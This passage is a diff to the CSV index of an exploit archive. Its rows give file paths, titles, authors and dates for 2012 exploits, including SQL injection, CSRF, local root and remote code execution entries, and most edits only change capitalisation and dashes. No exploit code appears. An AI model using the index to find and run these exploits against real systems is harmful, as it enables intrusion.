64-bit)",2012-01-23,zx2c4,linux,local,0 +18411,platforms/linux/local/18411.c,"Mempodipper - Linux Local Root => 2.6.39 (32-bit & 64-bit)",2012-01-23,zx2c4,linux,local,0 18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0 -18416,platforms/jsp/webapps/18416.txt,"Stoneware WebNetwork6 Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 -18417,platforms/php/webapps/18417.txt,"WordPress <= 3.3.1 Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 +18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 +18417,platforms/php/webapps/18417.txt,"wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 Create Folder Remote Code Exec BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0 @@ -15933,7 +15931,7 @@ id,file,description,date,author,platform,type,port 18426,platforms/windows/remote/18426.rb,"MS12-004 midiOutPlayNextPolyEvent Heap Overflow",2012-01-28,metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18428,platforms/php/webapps/18428.txt,"HostBill App Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0 -18429,platforms/php/webapps/18429.pl,"4images 1.7.6 => 9 Csrf inject php code",2012-01-30,Or4nG.M4N,php,webapps,0 +18429,platforms/php/webapps/18429.pl,"4images 1.7.6 - 9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 SQLi Vulnerability",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 18432,platforms/php/webapps/18432.txt,"phux Download Manager Blind SQL Injection Vulnerability",2012-01-30,"Red Security TEAM",php,webapps,0 @@ -15947,7 +15945,7 @@ id,file,description,date,author,platform,type,port 18441,platforms/php/webapps/18441.txt,"Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability",2012-01-31,"Cagri Tepebasili",php,webapps,0 18442,platforms/multiple/remote/18442.html,"Apache httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 18443,platforms/php/webapps/18443.txt,"swDesk Multiple Vulnerabilities",2012-02-01,"Red Security TEAM",php,webapps,0 -18444,platforms/php/webapps/18444.txt,"SiT! Support Incident Tracker 3.64 Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +18444,platforms/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0 18446,platforms/hardware/remote/18446.html,"Webkit normalize bug for android 2.2 (CVE-2010-1759)",2012-02-01,"MJ Keith",hardware,remote,0 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail Cross-Site Scripting Vulnerability",2012-01-13,"Sajjad Pourali",asp,webapps,0 18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,metasploit,windows,remote,0 @@ -15984,7 +15982,7 @@ id,file,description,date,author,platform,type,port 18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger <= 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 -18491,platforms/windows/dos/18491.txt,"XnView <= 1.98.5 Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 +18491,platforms/windows/dos/18491.txt,"xnview <= 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 18494,platforms/php/webapps/18494.txt,"Pandora FMS 4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 @@ -16001,12 +15999,12 @@ id,file,description,date,author,platform,type,port 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 -18510,platforms/windows/webapps/18510.txt,"WebcamXP and Webcam 7 Directory Traversal Vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 +18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 Multiple Vulnerabilities (Steal Authentication Credentials)",2012-02-22,"Ivano Binetti",php,webapps,0 18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 -18515,platforms/windows/local/18515.rb,"Orbit Downloader URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 +18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone Privilege Escalation - Security Advisory - SOS-12-001",2012-02-23,"Sense of Security",hardware,webapps,0 18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 @@ -16030,7 +16028,7 @@ id,file,description,date,author,platform,type,port 18542,platforms/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability",2012-02-29,"SecPod Research",windows,remote,0 18543,platforms/windows/remote/18543.py,"Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability",2012-02-29,"SecPod Research",windows,remote,0 18544,platforms/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,php,webapps,0 -18545,platforms/php/webapps/18545.txt,"Wolf CMS v0.7.5 Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 +18545,platforms/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 18546,platforms/windows/dos/18546.txt,"Novell Groupwise Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 .pls Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0 18548,platforms/windows/local/18548.rb,"VLC Media Player RealText Subtitle Overflow",2012-03-02,metasploit,windows,local,0 @@ -16045,12 +16043,12 @@ id,file,description,date,author,platform,type,port 18559,platforms/php/webapps/18559.txt,"AneCMS v.2e2c583 LFI exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 Local File Disclosure - Security Advisory - SOS-12-002",2012-03-05,"Sense of Security",php,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 -18563,platforms/php/webapps/18563.txt,"ForkCMS 3.2.5 Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 +18563,platforms/php/webapps/18563.txt,"forkcms 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,metasploit,php,remote,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store SQL Injection - Security Advisory - SOS-12-003",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 -18571,platforms/php/webapps/18571.txt,"Promise WebPAM 2.2.0.13 - Multiple Remote Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 +18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 'cprt' Overflow""",2012-03-08,metasploit,windows,remote,0 18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload Vulnerability",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 @@ -16066,18 +16064,18 @@ id,file,description,date,author,platform,type,port 18590,platforms/php/webapps/18590.txt,"PBLang local file include vulnerability",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery SQL Injection Exploit",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4images - Image Gallery Management System - [CSRF] Change mail user or admin",2012-03-13,"Dmar al3noOoz",php,webapps,0 -18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 CSRF Vulnerabilities",2012-03-14,"Ivano Binetti",hardware,webapps,0 18598,platforms/php/webapps/18598.txt,"Encaps PHP Gallery SQL Injection",2012-03-14,"Daniel Godoy",php,webapps,0 18599,platforms/php/webapps/18599.txt,"asaanCart XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 -18600,platforms/multiple/dos/18600.txt,"Presto! PageManager <= 9.01 Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 +18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,metasploit,windows,remote,0 -18605,platforms/windows/webapps/18605.txt,"Sockso <= 1.5 Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 +18605,platforms/windows/webapps/18605.txt,"sockso <= 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services Use After Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion Vulnerability",2012-03-16,mr.pr0n,php,webapps,0 18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent XSS for logged in users",2012-03-16,storm,php,webapps,0 @@ -16115,7 +16113,7 @@ id,file,description,date,author,platform,type,port 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0 18647,platforms/php/webapps/18647.txt,"PHP Grade Book 1.9.4 Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps,0 18648,platforms/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps,0 -18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0, 2.9.0 Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 +18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0, 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 Multiple Vulnerabilities (CSRF - XSS)",2012-03-23,"Ivano Binetti",php,webapps,0 @@ -16139,13 +16137,13 @@ id,file,description,date,author,platform,type,port 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0 18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation Vulnerability",2012-03-30,metasploit,multiple,remote,0 -18680,platforms/php/webapps/18680.txt,"Coppermine 1.5.18 Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 +18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow Vulnerability",2012-03-30,Vulnerability-Lab,windows,local,0 18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities",2012-03-30,"SecPod Research",php,webapps,0 18683,platforms/windows/remote/18683.py,"MailMax <= 4.6 - POP3 ""USER"" Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 and earlier CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 18686,platforms/php/webapps/18686.txt,"SyndeoCMS <= 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 -18687,platforms/php/webapps/18687.txt,"Landshop v0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 +18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 [WN]KT KickTipp 3.1 remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 @@ -16153,25 +16151,25 @@ id,file,description,date,author,platform,type,port 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 -18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 +18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 Buffer Overflow',",2012-04-04,metasploit,windows,remote,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0 18699,platforms/php/webapps/18699.txt,"PlumeCMS <= 1.2.4 Multiple Persistent XSS",2012-04-04,"Ivano Binetti",php,webapps,0 -18700,platforms/php/webapps/18700.txt,"'e-ticketing' SQL Injection (CVE-2012-1673)",2012-04-04,"Mark Stanislav",php,webapps,0 -18701,platforms/php/webapps/18701.txt,"'phpPaleo' Local File Inclusion (CVE-2012-1671)",2012-04-04,"Mark Stanislav",php,webapps,0 -18702,platforms/php/webapps/18702.txt,"'Hotel Booking Portal' SQL Injection (CVE-2012-1672)",2012-04-04,"Mark Stanislav",php,webapps,0 +18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 +18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 +18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite poc",2012-04-05,rgod,windows,remote,0 18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite poc",2012-04-05,rgod,windows,remote,0 18705,platforms/hardware/dos/18705.txt,"Sony Bravia Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos,0 18708,platforms/php/webapps/18708.txt,"GENU CMS SQL Injection Vulnerability",2012-04-05,"hordcode security",php,webapps,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,metasploit,windows,remote,0 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,metasploit,windows,local,0 -18711,platforms/php/webapps/18711.txt,"w-CMS 2.0.1 Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 +18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 -18718,platforms/windows/remote/18718.txt,"Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability",2012-04-08,modpr0be,windows,remote,0 +18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal vulnerability",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin Vulnerability",2012-04-08,Dr.NaNo,php,webapps,0 18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 @@ -16200,7 +16198,7 @@ id,file,description,date,author,platform,type,port 18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 -18752,platforms/php/webapps/18752.txt,"Newscoop 3.5.3 Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 +18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0 18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,FB1H2S,windows,dos,0 @@ -16212,13 +16210,13 @@ id,file,description,date,author,platform,type,port 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 -18765,platforms/windows/dos/18765.txt,"Samsung NET-i ware <= 1.37 Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 +18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download Vulnerability",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 -18773,platforms/php/webapps/18773.txt,"ExponentCMS 2.0.5 Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0 +18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 Buffer Overflow",2012-04-24,shinnai,windows,dos,0 @@ -16227,11 +16225,11 @@ id,file,description,date,author,platform,type,port 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0 18780,platforms/windows/remote/18780.rb,"MS12-027 MSCOMCTL ActiveX Buffer Overflow",2012-04-25,metasploit,windows,remote,0 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 Buffer Overflow",2012-04-25,metasploit,windows,local,0 -18782,platforms/php/webapps/18782.txt,"Piwigo 2.3.3 Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 +18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary root File Identification",2012-04-25,Sha0,linux,local,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 18787,platforms/php/webapps/18787.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 -18788,platforms/php/webapps/18788.txt,"PHP Volunteer Management 1.0.2 Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 +18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18791,platforms/php/webapps/18791.txt,"Wordpress 3.3.1 Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow Exploit",2012-04-27,"Xenithz xpt",windows,local,0 18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 SQL Injection Vulnerabilitiy",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 @@ -16249,8 +16247,8 @@ id,file,description,date,author,platform,type,port 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,Blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",2012-05-01,metasploit,windows,remote,0 -18813,platforms/php/webapps/18813.txt,"OpenCart 1.5.2.1 Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 -18814,platforms/php/webapps/18814.txt,"MyClientBase v0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 +18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 +18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service Vulnerability",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 @@ -16271,7 +16269,7 @@ id,file,description,date,author,platform,type,port 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0 18842,platforms/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 -18843,platforms/php/webapps/18843.txt,"MYRE Real Estate Mobile 2012/2 Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 +18843,platforms/php/webapps/18843.txt,"myre real estate mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18844,platforms/php/webapps/18844.txt,"myCare2x CMS Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 SQLi Vulnerability",2012-05-07,loneferret,php,webapps,0 18847,platforms/windows/remote/18847.rb,"Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access 